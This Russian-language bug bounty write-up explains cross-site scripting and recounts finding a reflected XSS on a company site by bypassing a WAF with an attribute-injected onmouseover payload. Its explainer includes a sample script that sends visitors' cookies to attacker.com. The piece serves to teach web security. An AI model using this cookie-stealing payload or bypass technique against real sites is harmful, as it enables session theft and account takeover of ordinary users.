Привет всем, я надеюсь, что у вас все хорошо и отлично! В этой статье мы поговорим о странном xss, который я нашел в одной из самых известных компаний по производству энергетических напитков (вы уже могли догадаться 😉)
Содержание этой статьи:
1- Что такое XSS?
2- История странного XSS.
Итак, давайте начнем наше хакерское путешествие.

#1. ЧТО ТАКОЕ XSS?
Вы когда-нибудь слышали термин «Javascript»? Если да, то хорошо, но если нет, то это не что иное, как язык программирования, наиболее часто используемый на стороне клиента (браузеры, такие как Firefox, Chrome и т. д.). Вы все, должно быть, посещали веб-сайты с очень причудливым внешним видом, анимацией и т. д. Ну, это возможно благодаря javascript. Он может контролировать всю веб-страницу и манипулировать ею по выбору разработчика!
Это очень удобно для разработчиков, поскольку они могут с легкостью добавлять больше дизайна, функций и т. д. с помощью Javascript. Но спросите себя, как вы думаете, что произойдет, если кто-то другой (злоумышленник) сможет написать свой собственный код javascript на чужом веб-сайте?

Вы уже могли догадаться 😉
Затем этот конкретный пользователь может манипулировать чьим-либо веб-сайтом без авторизации и может что-либо изменить или сделать что-либо на веб-странице.
Вот как работает межсайтовый скриптинг.
В общих чертах, МЕЖСАЙТСКИЙ СЦЕНАРИЙ (XSS) – это уязвимость веб-приложения, позволяющая злоумышленнику внедрить в веб-приложение собственный вредоносный код.
Теперь, достигнув xss, злоумышленник может:
1- Изменить содержимое страницы.
2- Украсть печенье.
3- Перенаправить пользователей.
4- Доставка вредоносных программ
и так далее…
Давайте посмотрим на один пример:
#Пример:
Предположим, функция комментариев Facebook уязвима для xss. Теперь злоумышленник зашел на страницу какой-то известной личности (скажем, Роналду) и в своем последнем посте прокомментировал:
‹script›document.location.href="https://attacker.com/?cookie=" + document.cookie‹/script›
Теперь этот код будет отправлять злоумышленнику куки каждого человека, посетившего пост Роналду. И, используя эти файлы cookie, злоумышленник теперь может получить полный контроль над учетной записью жертвы.
В этом случае каждый, кто увидит последний пост Роналду, станет жертвой злоумышленника и потеряет свой аккаунт в пользу злоумышленника. А так как Роналду — очень известная личность, злоумышленник может взломать как минимум 10 МИЛЛИОНОВ пользователей, просто воспользовавшись приведенным выше скриптом!!!!!!!!
Теперь я надеюсь, что вы поняли, что такое xss и почему это одна из самых опасных уязвимостей.
Чтобы узнать больше о xss, вы можете посетить этот веб-сайт:
Перейдем к нашей истории 😄
#2. История странного X S S
В сентябре месяце я начал охотиться за частной программой вознаграждения за ошибки, в которой есть все. Итак, я начал свой процесс разведки и начал искать некоторые распространенные уязвимости, такие как Open Redirection, CSRF и т. д. За 2–3 дня я нашел 9 уязвимостей в компании и сообщил обо всех. Но, к сожалению, все они были помечены либо как повторяющиеся, либо как неприменимые.

На следующий день я начал тестировать новое веб-приложение, которое работало на сервере ASP. Я попытался найти некоторые скрытые параметры с помощью некоторых инструментов, таких как FFUF и Paramspider, и нашел параметр menuid. Я перехватил запрос в burpsuite и попытался внедрить обычный тег ‹script›alert(1)‹/script›, но он был защищен и перенаправил меня на страницу NotFound.aspx. Я уже собирался сдаться, но потом подумал добавить ‹› к значению параметра, но результат все тот же😑
Затем я подумал, давайте закодируем специальные символы в URL и посмотрим, что произойдет после этого. Я закодировал ‹ в %3c и › в %3e, и, к моему удивлению, он отобразился!!
Затем я попытался внедрить ‹script›alert(1)‹/script›, но это не сработало. Похоже, серверная часть проверяла некоторые вредоносные теги, чтобы предотвратить xss. Через некоторое время я обнаружил, что когда я добавляю «/» в полезную нагрузку, он запускает WAF и перенаправляет меня на страницу NotFound.
Копнув глубже, я обнаружил, что полезная нагрузка отражалась в теге div. Что-то вроде этого:
‹div menuid="reflected_data"›‹/div›
Затем я попытался проверить, какие значения отражены на странице, и нашел:
«» → Отраженный
‹› → Отраженный
/ → Заблокировано
‹все между тегами› → Заблокировано
‹все → Отражено
›все → Отраженное
Проанализировав поведение веб-страницы, я пришел к выводу, что мы не можем использовать никакие теги, так как это сразу заблокирует нас. Итак, наша единственная цель — события javascript, такие как onmouseover, onclick и т. д.
Поэтому я создал полезную нагрузку ниже, используя приведенную выше информацию:
Бэтмен“ onmouseover=alert(1)›
поэтому, если я передам это значение в параметр, он закроет строку и позволит мне добавить такое событие:
‹div menuid=”batman” onmouseover=alert(1)› ”› ‹/div›
И БУМ! Это было отражено, и я получил SCARY ALERT 1 POP UP! 😁😁

Я сразу же сообщил об этой проблеме в компанию, и в благодарность они наградили меня 1 подносом своих энергетических напитков !!
я был как

Выводы:
1- Никогда не сдавайся.
2- Анализ веб-ответа и атака в соответствии с ним.
3- Следуйте по менее проторенной дороге.
4- Никогда не прекращайте учиться.
5- Попробуйте добавить специальные символы и посмотрите ответ.
Это все для этой статьи. Надеюсь, что вы узнали из него что-то новое. Дайте мне знать, если у вас есть сомнения относительно этой статьи или XSS 😄
Мы встретимся снова в следующей статье. До тех пор

Учетная запись LinkedIn: https://www.linkedin.com/in/faiyaz-ahmad-64457520b/
Аккаунт в Твиттере: https://twitter.com/FaIyaZz007
ОБНОВЛЕНИЕ: Если кто-то заинтересован во взломе Windows только с помощью python, он может записаться на курс ниже бесплатно! Просто используйте «FEBHACK» в купоне.
Ссылка на курс: https://www.udemy.com/course/hacking-windows-with-python-from-scratch-2022/?referralCode=1647ED5816EFD5D2F2EB